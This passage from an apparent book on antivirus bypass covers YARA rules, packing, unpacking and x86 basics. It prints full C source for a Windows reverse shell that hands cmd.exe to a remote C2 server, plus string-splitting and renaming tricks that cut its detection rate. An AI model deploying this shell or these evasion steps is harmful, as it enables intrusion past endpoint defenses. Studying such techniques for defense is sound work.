$DOS_ Header = "!This program cannot be run in DOS mode."         $a1 = "EncryptFileW"         $a2 = "AddAce"         $a3 = "ImmGetContext" nocase          $a4 = "g27kkY9019n7t01"     condition:         $DOS_Header and all of ($a*) } This YARA rule will detect the Locky ransomware by the basic Disk Operating System (DOS) header and all of the used strings under the strings section. To check whether this signature indeed matches and detects the Locky ransomware file, we need to execute the following command: yara <rule_name> <file_to_scan> 108 Bypassing the Static Engine In the following screenshot, you can see that by using a YARA rule, we detected the Locky ransomware sample: Figure 5.3 – YARA detection of the Locky ransomware Let's see one more YARA detection-signature example. YARA signature example – Emotet downloader In this case, we will look at the Emotet downloader, which is a Microsoft Word that includes malicious Visual Basic for Applications (VBA) macros that will download the next stages of the attack. Most of the time, Emotet will download banker's malware that is used for downloading other malware as the next stage of the attack. This malware can include banking trojans such as TrickBot, IcedID, and more. The following code snippet shows a YARA signature that we wrote to detect malicious documents containing this VBA macro: rule Emotet_02122020 {     meta:         description = "Emotet 1st stage downloader"     strings:         $a1 = "[Content_Types].xml"         $a2 = "word"         $a3 = "SkzznWP.wmfPK" nocase         $a4 = "dSalZH.wmf"          $a5 = "vbaProject.bin"     condition:         all of them } This YARA rule will detect the Emotet malware based on all of the strings used under the strings section. Antivirus bypass using obfuscation 109 In the following screenshot, you can see that by using a YARA rule, we detected the Emotet downloader sample: Figure 5.4 – YARA detection of the Emotet malware Now that we have knowledge of how YARA works, let's see how to bypass it. How to bypass YARA Bypassing static signatures is dismayingly simple. If a YARA signature is written in a more generic way—or even, perhaps, for a specific malware variant, it can be bypassed just by modifying and manipulating some strings, and even the code of the malware itself. Relying on YARA as the main detection engine is not a good practice, but it is always helpful to implement it as an additional layer of detection. Static engine bypass – practical example The following example demonstrates the use of relatively simple code to open a Transmission Control Protocol (TCP)-based reverse shell to a Netcat listener based on a predefined Internet Protocol (IP) address and port (https://github.com/ dev-frog/C-Reverse-Shell/blob/master/re.cpp): #include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #pragma comment(lib, "Ws2_32.lib") #define DEFAULT_BUFLEN 1024 void ExecuteShell(char* C2Server, int C2Port) {     while(true) {         SOCKET mySocket;         sockaddr_in addr;         WSADATA version; 110 Bypassing the Static Engine         WSAStartup(MAKEWORD(2,2), &version);         mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_ TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);         addr.sin_family = AF_INET;         addr.sin_addr.s_addr = inet_addr(C2Server);           addr.sin_port = htons(C2Port);     if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL ==SOCKET_ERROR) {             closesocket(mySocket);             WSACleanup();             continue;         }         else {             char RecvData[DEFAULT_BUFLEN];             memset(RecvData, 0, sizeof(RecvData));             int RecvCode = recv(mySocket, RecvData, DEFAULT_ BUFLEN, 0);             if (RecvCode <= 0) {                 closesocket(mySocket);                 WSACleanup();                 continue;             }             else {                 char Process[] = "cmd.exe";                 STARTUPINFO sinfo;                 PROCESS_INFORMATION pinfo;                 memset(&sinfo, 0, sizeof(sinfo));                 sinfo.cb = sizeof(sinfo);                 sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_ USESHOWWINDOW);                 sinfo.hStdInput = sinfo.hStdOutput = sinfo. hStdError = (HANDLE) mySocket; CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);                 WaitForSingleObject(pinfo.hProcess, INFINITE); Antivirus bypass using obfuscation 111                 CloseHandle(pinfo.hProcess);                 CloseHandle(pinfo.hThread);                 memset(RecvData, 0, sizeof(RecvData));                int RecvCode = recv(mySocket, RecvData, DEFAULT_ BUFLEN, 0);                 if (RecvCode <= 0) {                     closesocket(mySocket);                     WSACleanup();                     continue;                 }                 if (strcmp(RecvData, "exit\n") == 0) {                     exit(0);                 }             }         }     } } int main(int argc, char **argv) {     FreeConsole();     if (argc == 3) {         int port  = atoi(argv[2]);          ExecuteShell(argv[1], port);     }     else {         char host[] = "";         int port = 443;         ExecuteShell(host, port);     }     return 0; } This code has three functions: main(), which is where the program starts, FreeConsole(), which detaches the calling process from its console, and ExecuteShell(), which executes the reverse shell. 112 Bypassing the Static Engine Next, to compile the code, run the following command: i686-w64-mingw32-g++ socket.cpp -o before_obfuscation.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive We uploaded the compiled PE executable to VirusTotal, and we received the following detection results: Figure 5.5 – VirusTotal's detection result of 28/71 These results are fairly high, even for a simple command-line-based reverse shell. However, if we obfuscate this code somewhat, we can actually bypass most of these antivirus engines. Antivirus bypass using obfuscation 113 Here is the first section of the main() function, where our code starts to execute: Figure 5.6 – The host and port arguments and the Run function after the change The main function takes two arguments that we pass in the next few lines: the IP address of the remote attacker (, and the remote port of 443, which listens on the IP of the attacker (command-and-control (C2/C&C) server). Next, we define the socket mechanism, as follows: Figure 5.7 – The ExecuteShell function changed to the Run function 114 Bypassing the Static Engine This code is part of the Run() function, changed from the previous suspicious name of RunShell(). The Run() function takes two arguments: the host IP, and the listening port (443) of the attacker's C2 server. The use of port 443 is less suspicious because it is a very widely used and legitimate-seeming port. First, we use the WSAStartup function to initialize the socket, and then we use the inet_addr and htons functions to pass the arguments that will be used as the attacker's remote server IP and listening port. Finally, we use the WSAConnect function to initiate and execute the connection to the remote attacker's server. Next is the section of code used to execute the cmd.exe-based shell that we have naturally obfuscated, using the simple trick of splitting the string—"cm" and "d.exe", which are immediately concatenated into the string of the P variable, instead of using the highly suspicious string value "cmd.exe" to evade antivirus detection engines. You can see the code here: Figure 5.8 – After basic obfuscation of cmd.exe Antivirus bypass using obfuscation 115 Based on the preceding code, we took the following steps to significantly reduce the number of detections: • Renamed the function from RunShell to Run • Renamed the function parameters from C2Server and C2Port to Server and Port • Manipulated the "cmd.exe" string of the Process variable, splitting it into two different strings, P1 and P2, which are then concatenated using the standard strcat() C function into the P variable that is then passed as the second parameter of the CreateProcess Windows application programming interface (API) function After taking these extremely simple steps to modify the original code, we compiled the simple TCP-based reverse shell once more, uploaded the file to VirusTotal, and received the following far more successful detection results—only 9 engines detected the file, down from 28 previously: Figure 5.9 – VirusTotal's detection result of 9/68 116 Bypassing the Static Engine Here is a list of major antivirus vendors that we could successfully bypass using only this technique: • Avast • Avira (No Cloud) • Bitdefender • Comodo • CrowdStrike Falcon • Cybereason • Cynet • Fortinet • F-Secure • G-Data • Malwarebytes • Palo Alto Networks • Sophos • Symantec • Trend Micro For the purpose of the presented Proof of Concept (PoC), we did not use prewritten obfuscators but used a manual approach to manipulate antivirus static engines. Important note When antivirus software detects your malware, always look at the signature name provided by the antivirus. The signature name is the reason why the file was detected as malware. For example, if the detection name includes the string All your files have been encrypted, it is likely that the ransomware has been detected because the ransomware file includes a "malicious" string. Armed with this information, you may be able to bypass static engines by simply renaming the strings. To summarize, YARA is a lightweight but powerful pattern-matching tool used by many antivirus vendors as part of their static detection engines. By exploring the building blocks of YARA, as we have done here, it is easier to understand how, if a YARA rule is not written precisely, it can be easily bypassed with some basic strings and code manipulations. Antivirus bypass using encryption 117 Now that we know how to use basic obfuscation to bypass antivirus software, we can move on to the next technique we used during our research: encryption. Antivirus bypass using encryption Encrypting code is one of the most common ways to succeed with a bypass and one of the most efficient ways to hide the source code. Using encryption, the malicious functionality of the malware will appear as a harmless piece of code and sometimes seem to be completely irrelevant, meaning the antivirus software will treat it as such and will allow the malware to successfully run on the system. But before malware starts to execute its malicious functionality, it needs to decrypt its code within runtime memory. Only after the malware decrypts itself will the code be ready to begin its malicious actions. The following diagram shows the difference between an EXE file with and without encryption: Figure 5.10 – Malware before and after encryption took place In order to use code encryption techniques correctly, there are a few basic sub-techniques to be familiar with that we used while writing this book. Here are these sub-techniques: • Oligomorphic code • Polymorphic code • Metamorphic code—this is not necessarily a code-encryption technique, but we have included it in this category to emphasize the distinctions Let's expand these three sub-techniques. 118 Bypassing the Static Engine Oligomorphic code Oligomorphic code includes several decryptors that malware can use. Each time it runs on the system, it randomly chooses a different decryptor to decrypt itself, as shown in the following diagram: Figure 5.11 – Oligomorphic diagram To simplify our explanation, in this diagram we have illustrated seven ways to conduct the decryption mechanism, but in reality, malware can have 50, 100, and even several hundreds of types of decryptors that it can use to perform decryption on itself. The number is never fixed, but because of the limited quantity of decryptors that oligomorphic code uses, it is still possible to conduct detection using static signatures. Polymorphic code Polymorphic code is more advanced than oligomorphic code. Polymorphic code mostly uses a polymorphic engine that usually has two roles. The first role is choosing which decryptor to use, and the second role is loading the relevant source code so that the encrypted code will match the selected decryptor. Antivirus bypass using encryption 119 The number of decryptors will be far higher than with oligomorphic code. In fact, the quantity can reach the hundreds of thousands—and, in extreme cases, even millions of relevant decryptors, but the malicious result of the malware is always the same. You can see an example diagram here: Figure 5.12 – Polymorphic diagram This example diagram presents a certain type of malware that has 15 different methods to achieve a single malicious functionality. We can see that each time it runs, the malware calls the polymorphic engine and chooses a decryptor it is going to use to execute the decryption. Based on this choice, it loads the relevant source code and then recompiles itself, thus managing to avoid detection by the static engine of the antivirus software. This diagram is also a little different from malware in the real world. In the real world, there are more than 15 decryptors. In fact, there is an unlimited number of different methods to reach its malicious functionality. 120 Bypassing the Static Engine Metamorphic code Metamorphic code is code whose goal is to change the content of malware each time it runs, thus causing itself to mutate. For example, the change can be such that the malware adds completely useless conditions and variables to itself with no effect on its functionality, changes machine instructions, adds no operation (NOP) instructions to itself in various locations, and more. The following diagram demonstrates an example of malware mutation using metamorphic code: Figure 5.13 – Metamorphic diagram In this diagram, we can see three versions of the same code in x86 assembly language. With each mutation, the code looks different, but the result is always the same. Since the result of the mutation is identical to that of the original malware, it is possible to detect metamorphic-based malware using the heuristic engine. These three sub-techniques are very powerful and can be used as part of our antivirus bypass techniques' arsenal. Let's move on to the next technique we used during our research: packing. Antivirus bypass using packing 121 Antivirus bypass using packing Packers are programs that are used most of the time to compress code in binary files (mostly EXE files). While these programs are not, in themselves, harmful and can in fact be used for a variety of useful purposes, malware authors tend to use packers to hide their code's intentions, making malware research more difficult and potentially aiding their code in thwarting static antivirus engines. This section of the book will present the major differences between regular and packed executables, explore how to detect packers, and explain how to defeat them. Central to this task is understanding the importance and maintenance of unpacking engines used by various types of antivirus software. How packers work To explain how packers work, we will run a simple "Hello World.exe" file through two different packers, Ultimate Packer for eXecutables (UPX) and ASPack, each of which uses a different packing technique. In general, packers work by taking an EXE file and obfuscating and compressing the code section (".text" section) using a predefined algorithm. Following this, packers add a region in the file referred to as a stub, whose purpose is to unpack the software or malware in the operating system's runtime memory and transfer the execution to the original entry point (OEP). The OEP is the entry point that was originally defined as the start of program execution before packing took place. The main goal of antivirus software is to detect which type of packer has been used, unpack the sample using the appropriate techniques for each packer using its unpacking engine, and then classify the unpacked file as either "malicious" or "benign." The unpacking process Some unpacking techniques are as simple as overwriting a memory region or a specific section in the executable. Many of them use various self-injection techniques, by injecting a blob or a shellcode to a predefined or allocated region of memory, transferring execution to the injected code, and finally overwriting their own process. Unpacking can also be achieved by loading an external dynamic-link library (DLL) to do the dirty job. Furthermore, some packers can use process-injection techniques such as process hollowing, discussed previously, which in most cases creates a legitimate process such as notepad.exe in a suspended state, hollows a part of its memory region, and finally injects the unpacked payload before resuming the suspended process. Let's look at a few practical unpacking examples to understand this concept in detail. 122 Bypassing the Static Engine UPX – first example This packer is widely used by legitimate software and malware authors alike. First, we will pack our sample Hello World.exe file, and then we will unpack it using the -d argument built into UPX. Finally, we will conduct the unpacking process manually to understand some of the inner workings of this packer. These two examples will give you an idea of the concepts and practice of the unpacking flow. Before we pack the sample, we first put the Hello World.exe executable into a tool called DiE (short for Detect it Easy). The following screenshot tells us that the executable has been compiled with C/C++ and that there is no sign of any "protection" mechanism: Figure 5.14 – DiE output We then check the entropy of the file. Entropy is a measurement of randomness in a given set of values or, in this case, when we check whether the file is packed or not. In the following screenshot, we can see that the entropy value is not high (less than 7.0), which tells us that the executable is not packed yet: Antivirus bypass using packing 123 Figure 5.15 – DiE entropy value Another great indicator of a packed file is the function imports that the file includes, which are small compared to a non-packed executable. The following screenshot shows a normal number of imported DLLs and API functions used by the executable using the PE-bear tool (https://github.com/hasherezade/bearparser): Figure 5.16 – The Import Address Table (IAT) of the file 124 Bypassing the Static Engine In addition, in the following screenshot, we can see that the entry point (EP) of this program is 0x12D0, which is the address where this executable needs to begin its execution: Figure 5.17 – The entry-point value of the file Now that we understand what a regular file looks like before packing takes place, we can pack the Hello World.exe executable using UPX, with the following command: UPX.exe <file_name> -o <output_name> The following screenshot demonstrates how to do this using Command Prompt: Figure 5.18 – The Hello World.exe packing UPX command Antivirus bypass using packing 125 Now, testing the packed Hello World.exe executable in the DiE tool reveals very different results, as shown here: Figure 5.19 – DiE output after UPX packing took place And as you can see, the executable is successfully detected as a UPX-packed binary. The entropy and the section names support this conclusion, as seen in the following screenshot: Figure 5.20 – DiE entropy value after UPX packing took place 126 Bypassing the Static Engine Also, notice that the names of the sections changed to UPX0, UPX1, and UPX2, which can be taken as another indicator. The following diagram shows the PE sections before and after UPX packing took place: Figure 5.21 – UPX packing illustration In addition, using the PE-bear tool again, we can see here that the entry point of this packed version of Hello World.exe has also been changed to 0xC230: Figure 5.22 – The entry-point value of the file after UPX packing took place Antivirus bypass using packing 127 In the following screenshot, you can also clearly see the fairly small number of API function imports compared to the original executable: Figure 5.23 – The IAT of the file after UPX packing took place Once you understand the differences between the file before and after UPX packing, let's understand how to perform manual unpacking. Unpacking UPX files manually Here, we will first unpack the UPX-packed file using UPX's built-in -d argument, and then we will tackle it manually. With the following command, it is possible to unpack the UPX packed file: UPX.exe -d <filename> 128 Bypassing the Static Engine The following screenshot demonstrates the unpacked, cleaned version of the Hello World.exe executable after unpacking it using the -d argument: Figure 5.24 – The entry point of the file after unpacking Antivirus bypass using packing 129 We can see that we got the same clean binary with the same OEP and, of course, the DLLs' API function imports, as these existed before packing took place. Please note that the entry point will not always be the same as it was before packing, especially when conducting manual unpacking. Now, we can execute the unpacking process manually to help us better understand the inner mechanisms of UPX and the unpacking flow, as follows: 1. We first open the packed binary in x32dbg and find the entry point, with the instruction of pushad, as illustrated in the following screenshot: Figure 5.25 – The pushad instruction in x32dbg This screenshot shows that the instructions start at the earlier mentioned address of 0xC230, which is the entry point of the UPX1 section. 130 Bypassing the Static Engine 2. To confirm this, you can click on one of the memory addresses in the left pane of the debugger and choose Follow in Memory Map. This will point you to the mapped memory of the "UPX1" section, as seen in the following screenshot: Figure 5.26 – The UPX1 section in x32dbg 3. It is standard for UPX to overwrite the "UPX0" section with the unpacked data. With this knowledge, we can proceed to right-click on the "UPX0" section and click on Follow in Dump, as shown in the following screenshot: Antivirus bypass using packing 131 Figure 5.27 – Follow in Dump button Notice that this section is assigned ERW memory protection values, meaning that this section of memory is designated with execute, read, and write permissions. 4. Now, we can set a Dword Hardware, Access breakpoint on the first bytes in the memory offset of this section so that we can see when data is first being written to this location during execution, as can be seen in the following screenshot: Figure 5.28 – Dword | Hardware on access breakpoint 132 Bypassing the Static Engine 5. Then, we press F9 to execute the program—notice that this process repeats itself a number of times. As it executes, the Hardware, Access breakpoint will be triggered a number of times, and each time, it writes chunks of data to this memory section, as illustrated in the following screenshot: Figure 5.29 – Written data chunks to the UPX0 section 6. Now, if we right-click on the memory address—at 0x00401000, in this case— and click Follow in Disassembly, we will get to a place in the memory that looks strange at first glance, but if we scroll down a little bit, we can identify a normal "prologue" or function start, which is our actual OEP, as shown in the following screenshot: Figure 5.30 – The OEP 7. Another great indicator to check whether we have located the OEP is to check the strings. In the following screenshot, you can see that we found our "Hello World!" string after we located the OEP: Antivirus bypass using packing 133 Figure 5.31 – String indicator after the unpacking process Finally, we can use a tool such as Scylla (integrated into x32dbg) to dump the process and reconstruct the program's Import Address Table (IAT). 8. First, it is better to point the Extended IP (EIP) (or the RIP in 64-bit executables) register to the address of the OEP so that Scylla can detect the correct OEP and, from there, locate the IAT and get the imports. This screenshot demonstrates how Scylla looks once we found the OEP, and then clicked IAT Autosearch and Get Imports: Figure 5.32 – Scylla view: dump process 134 Bypassing the Static Engine 9. Afterward, we select the Dump button to dump the process and save it as a file. There are times where the unpacked executable will not work, so it is always helpful to try the Fix Dump button in Scylla, and then select the dumped executable. Here is a screenshot of IDA Pro recognizing the Hello World.exe executable with the Hello world! string: Figure 5.33 – The "Hello World!" string followed by a working code (IDA Pro view) Once we have followed these steps, the unpacked and dumped executable runs smoothly and without any problems. Now, let's proceed to the next example of manual unpacking. Unpacking ASPack manually – second example ASPack is another packer designed to pack PE files across a range of older and newer Windows versions. Malware authors also tend to use it to make detection by static antivirus engines harder and to potentially bypass them. ASPack is similar in some ways to UPX. For instance, execution is transferred from different memory regions and sections to the OEP after unpacking has taken place. Antivirus bypass using packing 135 In this practical example, we packed the same Hello World.exe file we used with the UPX packer, this time using the ASPack packer. Then, as we did before, we inspected the packed executable with the DiE tool, as can be seen in the following screenshot: Figure 5.34 – DiE output after ASPack packing took place As you can see, DiE has detected the file as an ASPack packed file. Now, let's proceed as follows: 1. If we check the sections and imports using PE-bear, we notice that there are relatively few imported functions, as seen in the following screenshot: Figure 5.35 – The IAT of the file after ASPack packing took place 136 Bypassing the Static Engine Please note that the section name where the packed executable is defined to start from is .aspack. In this case, the ASPack-packed executable dynamically loads more API functions during runtime, using both LoadLibraryA()and GetProcAddress(). The function that we want to focus on is VirtualAlloc(), which allocates virtual memory at a given memory address. In the case of ASPack, after the second time that VirtualAlloc()is executed, we can go to the .text section and find there our OEP, and then dump the unpacked data, as we presented in the section on manually unpacking UPX. 2. As we saw before, this starts at the defined entry point with the pushad instruction, which is located in the .aspack section, as seen in the following screenshot: Figure 5.36 – The entry point 3. Now, we can put a breakpoint on the VirtualAlloc() API function. This can be done by typing the bp command followed by the function name, as seen in the following screenshot: Figure 5.37 – The breakpoint on VirtualAlloc using the bp command Antivirus bypass using packing 137 This will cause the process to break at the call to the VirtualAlloc() API function. 4. Once we return from the VirtualAlloc() API function, we can observe that two memory regions were allocated: at the 0x00020000 address and at the 0x00030000 address. The following screenshot shows the two calls to VirtualAlloc() and the return value of the starting address of the second memory region, as part of the EAX register: Figure 5.38 – The two allocated memory regions using the VirtualAlloc Windows API function 5. The allocated memory of 0x00020000 will contain a "blob" or set of instructions that will unpack the code into the second memory region of 0x00030000, and from there, the unpacked code will be moved to the .text section of the process. This is done in the form of a loop that in turn parses and builds the unpacked code. After the loop is done, the Central Processing Unit (CPU) instruction of rep movsd is used to move the code to the .text section, where our OEP will appear. The following screenshot demonstrates the use of the rep movsd instruction, which moves the code from the memory of 0x00030000 to the .text section: Figure 5.39 – The rep movsd instruction 138 Bypassing the Static Engine 6. Next, with the unpacked code in the .text section, we can go to the Memory Map tab, right-click on the .text section, and select Follow in Disassembler, as can be seen in the following screenshot: Figure 5.40 – Follow in Disassembler button 7. Now, we land at the region of the unpacked code. Scrolling down, you will notice a function prologue that comprises two assembly instructions: push ebp and mov ebp, esp. This prologue is the start of the unpacked code— meaning our OEP. 8. Now, we will need to get the EIP register to point to the address of our OEP, and finally, dump our unpacked code using Scylla. Here is how the Scylla screen appears once we have the OEP and have selected IAT Autosearch and Get Imports: Antivirus bypass using packing 139 Figure 5.41 – Scylla view: dump process 9. Now, after clicking on the Dump button to dump the unpacked process and save it to a file, click Fix Dump to fix the dumped file, if needed. 10. In the following screenshot, you can see that the unpacked executable runs perfectly and without any issues: Figure 5.42 – The Hello World.exe file executes successfully after the manual unpacking process Now that we understand the two unpacking methods, let's proceed with some more information about packers. 140 Bypassing the Static Engine Packers – false positives Sometimes, when packing an executable file, antivirus software can falsely detect a legitimate file as a malicious one. The problem occurs with the static detection mechanism of the antivirus software, which may perform detection on the file after packing took place. The antivirus software compares particular strings to signatures in its database. For example, if a legitimate file contains a string named UPX0 as well as a string named UPX1, the antivirus software could flag this as malware. Obviously, this would be a false positive. The following screenshot demonstrates the results using VirusTotal when we scanned the original Windows executable, mspaint.exe: Figure 5.43 – VirusTotal's results of the original mspaint.exe file And here is the result of scanning the same file after packing it with UPX: Figure 5.44 – VirusTotal's results of the original mspaint.exe file after packing with UPX In the preceding screenshot, we can see four antivirus engines and Endpoint Detection and Response (EDR) have mistakenly detected the legitimate mspaint.exe file as malware. It is fair to assume that when one of these signature-based defense mechanisms is installed on the endpoint, it will not let the file run, even though it is a legitimate file mistakenly raising a false positive. Summary 141 Every packer is built differently and has a different effect on the executable file. Although using a packer is today widely seen as an effective method of bypassing antivirus engines, it is by no means enough. Antivirus programs contain a large number of automatic unpackers, and when antivirus software detects a packed file, it tries to determine which packer was used and then attempts to unpack it using the unpacking engine. Most of the time, it succeeds. But there is still another way to bypass antivirus engines using packing. To use this method, we must write an "in-house" custom-made packer or use a data compression algorithm unknown to the targeted antivirus software, thus causing the antivirus software to fail when it tries to unpack the malicious file. After writing a custom-made packer, it will be nearly impossible to detect the malware, because the unpacking engine of the antivirus software does not recognize the custom- made packer. To detect custom-made packers, antivirus vendors should know how to identify and reverse-engineer the custom-made packer, just as we did before, and then write an automated unpacking algorithm to make detection more effective. Now that we understand what packers are and why antivirus software cannot detect malware that is packed with a custom-made packer, we can now summarize this chapter. Summary In this chapter of the book, we learned about three antivirus static engine bypass techniques. We learned about rename and control-flow obfuscations, about YARA rules and how to bypass them easily, and we also learned about encryption types such as oligomorphism, polymorphism, and metamorphism, and why packing is a good method to bypass static antivirus engines. In the next chapter, you will learn about four general antivirus bypass techniques. 6 Other Antivirus Bypass Techniques In this chapter, we will go into deeper layers of understanding antivirus bypass techniques. We will first introduce you to Assembly x86 code so you can better understand the inner mechanisms of operating systems, compiled binaries, and software, then we will introduce you to the concept, usage, and practice of reverse engineering. Afterward, we will go through implementing antivirus bypass using binary patching, and then the use of junk code to circumvent and harden the analysis conducted by security researchers and antivirus software itself. Also, we will learn how to bypass antivirus software using PowerShell code, and the concept behind the use of a single malicious functionality. In this chapter, we will explore the following topics: • Antivirus bypass using binary patching • Antivirus bypass using junk code • Antivirus bypass using PowerShell • Antivirus bypass using a single malicious functionality • The power of combining several antivirus bypass techniques • Antivirus engines that we have bypassed in our research 144 Other Antivirus Bypass Techniques Technical requirements To follow along with the topics in the chapter, you will need the following: • Previous experience with antivirus software • A basic understanding of detecting malicious PE files • A basic understanding of the C/C++ or Python programming languages • A basic understanding of computer systems and operating system architecture • A basic understanding of PowerShell • Nice to have: Experience using debuggers and disassemblers such as IDA Pro and x64dbg Check out the following video to see the code in action: https://bit.ly/3zq6oqd Antivirus bypass using binary patching There are other ways to bypass antivirus software than using newly written code. We can also use a compiled binary file. There are a few antivirus software bypass techniques that can be performed with already compiled code that is ready to run, even if it is detected as malware by antivirus engines. We have used two sub-techniques while performing research toward writing this book: • Debugging / reverse engineering • Timestomping Let's look at these techniques in detail. Introduction to debugging / reverse engineering In order to perform reverse engineering on a compiled file in an Intel x86 environment, we must first understand the x86 assembly architecture. Assembly language was developed to replace machine code and let developers create programs more easily. Assembly is considered a low-level language, and as such, it has direct access to the computer's hardware, such as the CPU. Using assembly, the developer does not need to understand and write machine code. Over the years, many programming languages have been developed to make programming simpler for developers. Antivirus bypass using binary patching 145 Sometimes, if we – as security researchers – cannot decompile a program to get its source code, we need to use a tool called a disassembler to transform it from machine code to assembly code. The following diagram illustrates the flow from source code to assembly code: Figure 6.1 – The flow from source code to assembly code The debugging technique is based on changing individual values within the loaded process and then performing patching on the completed file. Before we dive into debugging malicious software in order to bypass antivirus, it is helpful to understand what reverse engineering involves. What is reverse engineering? Reverse engineering is the process of researching and understanding the true intentions behind a program or any other system, including discovering its engineering principles and technological aspects. In the information security field, this technique is used mostly to find vulnerabilities in code. Reverse engineering is also widely used to understand the malicious activities of various types of malware. In order to understand how to reverse engineer a file, we'll include a brief explanation of a few important fundamentals. 146 Other Antivirus Bypass Techniques The stack The stack is a type of memory used by system processes to store values such as variables and function parameters. The stack memory layout is based on the last in, first out (LIFO) principle, meaning that the first value that is stored in the stack is the first value to be "popped" from the stack. The following diagram demonstrates the LIFO principle: Data Element 5 is the last value to be pushed onto the stack, and it is therefore the first element to be popped from the stack: Figure 6.2 – Stack PUSH and POP operations Now we understand what the stack is, let's continue with the heap and the CPU registers. The heap In contrast to stack memory, which is linear, heap memory is "free-style," dynamically allocated memory. Heap memory can be allocated at any time and be freed at any time. It's used mainly to execute programs at runtime within operating systems. Antivirus bypass using binary patching 147 Assembly x86 registers The x86 architecture defines several general-purpose registers (GPRs), along with a number of registers for specific operations. The special memory locations are an integral part of the CPU and are used directly by the CPU. In today's computers, most registers are used for operations other than those for which they were originally intended. For example, the 32-bit ECX (or RCX in 64 bit) register is generally used as a counter for operations such as loops and comparisons, but it can also be used for other operations. The following list of registers describes the general purpose of each: • EAX – Used generally for arithmetic operations; in practice, used as a memory region to store return values, and for other purposes. • EBX – Generally used to store memory addresses. • ECX – Mostly used as a counter for loop operations and comparisons. • EDX – Mostly used for arithmetic division and multiplication operations that require more memory to store values. Also, EDX stores addresses used for I/O (input/output) operations. Indexes and pointers There are the registers used as pointers to specific locations: • ESI – The source index, mainly used to transfer data from one memory region to another memory region destination (EDI). • EDI – The destination index, mainly used as a destination for data being transferred from a source memory region (ESI). • ESP – Used as part of the stack frame definition, along with the EBP register. ESP points to the top of the stack. • EBP – Also used to define the stack frame, along with the ESP register. EBP points to the base of the stack. • EIP – Points to the next instruction to be executed by the CPU. 148 Other Antivirus Bypass Techniques Assembly x86 most commonly used instructions These are the basic and most commonly used CPU instructions: • MOV – Copies a value from the right operand to the left operand, for example, mov eax, 1. This will copy the value of 1 to the EAX register. • ADD – Adds a value from the right operand to the left operand, for example, add eax, 1. This will add the value of 1 to the EAX register. If the EAX register had previously stored the value of 2, its value after execution would be 3. • SUB – Subtracts a value from the left operand, for example, sub eax, 1. This will subtract the value stored in the EAX register by 1. If the EAX register had previously stored the value of 3, its value after execution would be 2. • CMP – Compares values between two operands, for example, cmp eax, 2. If the EAX register was storing a value equal to 2, usually the following instruction would contain a jump instruction that transfers the program execution to another location in the code. • XOR – Conducts a logical XOR operation using the right operand on the left operand. The XOR instruction is also used to zeroize CPU registers such as the EAX register, for example, xor eax, eax. This executes a logical XOR on the EAX register, using the value stored in the EAX register; thus, it will zeroize the value of EAX. • PUSH – Pushes a value onto the stack, for example, push eax. This will push the value stored in the EAX register onto the stack. • POP – Pops the most recent value pushed to the stack, for example, pop eax. This will pop the latest value pushed to the stack into the EAX register. • RET – Returns from the most recent function/subroutine call. • JMP – An unconditional jump to a specified location, for example, jmp eax. This will unconditionally jump to the location whose value is stored in the EAX register. • JE / JZ – A conditional jump to a specified location if the value equals a compared value or if the value is zero (ZF = 1). • JNE / JNZ – A conditional jump to a specified location if the value does not equal a compared value or if the value is non-zero (ZF = 0). Antivirus bypass using binary patching 149 The CPU has three different modes: • Real mode • Protected mode • Long mode The real mode registers used as 16-bit short like registers: AX, BX, DX, while the protected mode is based on 32-bit long registers such as EAX, EBX, EDX, and so on. The 64-bit long mode registers an extension for 32-bit long registers such as RAX, RBX, and RDX. The following is an illustration to simplify the layout representation of the registers: Figure 6.3 – Registers layout illustration Once we understand the basics of the assembly architecture, let's see some assembly x86 code examples. Assembly x86 code examples Example 1: Here is a basic Assembly x86 program to print a string with a value of "Hello, World": global  _main     extern  _printf     section .text _main:     push    string     call    _printf     add     esp, 4     ret 150 Other Antivirus Bypass Techniques string:     db  'Hello World!', 10, 0 To run this code on your machine, it is recommended to use NASM Assembler. You can download NASM from https://www.nasm.us/pub/nasm/ releasebuilds/2.15.05/win64/nasm-2.15.05-installer-x64.exe, and gcc, you can get from http://mingw-w64.org/doku.php/download. To execute the code, use the following commands: nasm -fwin32 Hello_World.asm gcc Hello_World.obj -o Hello_World.exe These are the commands used to compile the Hello_World.asm program: Figure 6.4 – Hello_World.asm compilation process The first line declares the main function of our code, and the second line imports the printf function. Next, the section instruction, followed by the .text declaration, will define the .text segment of our program, which will include all of the assembly instructions. The .text section contains two subroutines: the main subroutine that will execute all of the assembly instructions, and the "string" memory region that will hold the Hello World! message declared by the db assembly instruction. Under the _main subroutine, the first line is used to push the "Hello World!" message as a parameter to the _printf function, which will be called on the next line. The following line, call _printf, will call the _printf function and transfer execution to it. After the _printf function is executed, our message is printed to the screen and the program will return to the next line, add esp, 4, which will, in turn, clear the stack. Finally, the last line of ret will return and the program's execution will terminate. Antivirus bypass using binary patching 151 Example 2: This next example is simple symmetric XOR-based encryption, which takes a binary byte input of binary 101 and encrypts it with the binary key of 110. Then, the program decrypts the XOR-encrypted data with the same key: IDEAL MODEL SMALL STACK 100h DATASEG     data db 101B     key db  110B CODESEG encrypt:         xor dl, key         mov bl, dl         ret decrypt:         xor bl, key         mov dl, bl         ret start:         mov ax, @data         mov ds, ax         mov bl, data         mov dl, bl         call encrypt         call decrypt 152 Other Antivirus Bypass Techniques exit:     mov ah, 4ch     int 21h END start To run this code on your machine, it is recommended to use Turbo Assembler (TASM). You can download TASM at https://sourceforge.net/projects/ guitasm8086/. To execute the code, press F9: Figure 6.5– Assemble, Build, and Run example In the DATASEG segment, there are two variable declarations: the data intended to be encrypted, and a second variable that serves as our encryption key. In the CODESEG segment, we have the actual code or instructions of our program. This segment includes a number of subroutines, each with a unique purpose: the encrypt subroutine to encrypt our data, and the decrypt subroutine to decrypt our data after encryption takes place. Antivirus bypass using binary patching 153 Our program begins to execute from the start subroutine and will end by calling the exit subroutine, which, in turn, uses two lines of code to handle the exit process of our program. The first two lines of the start function initialize the variables defined within the DATASEG segment, while the third assigns the input variable to BL, the 8-bit lower portion of the 16-bit BX register. Then, the encryption subroutine is called by the call encrypt instruction. Once execution is transferred to the encrypt subroutine, our input will be 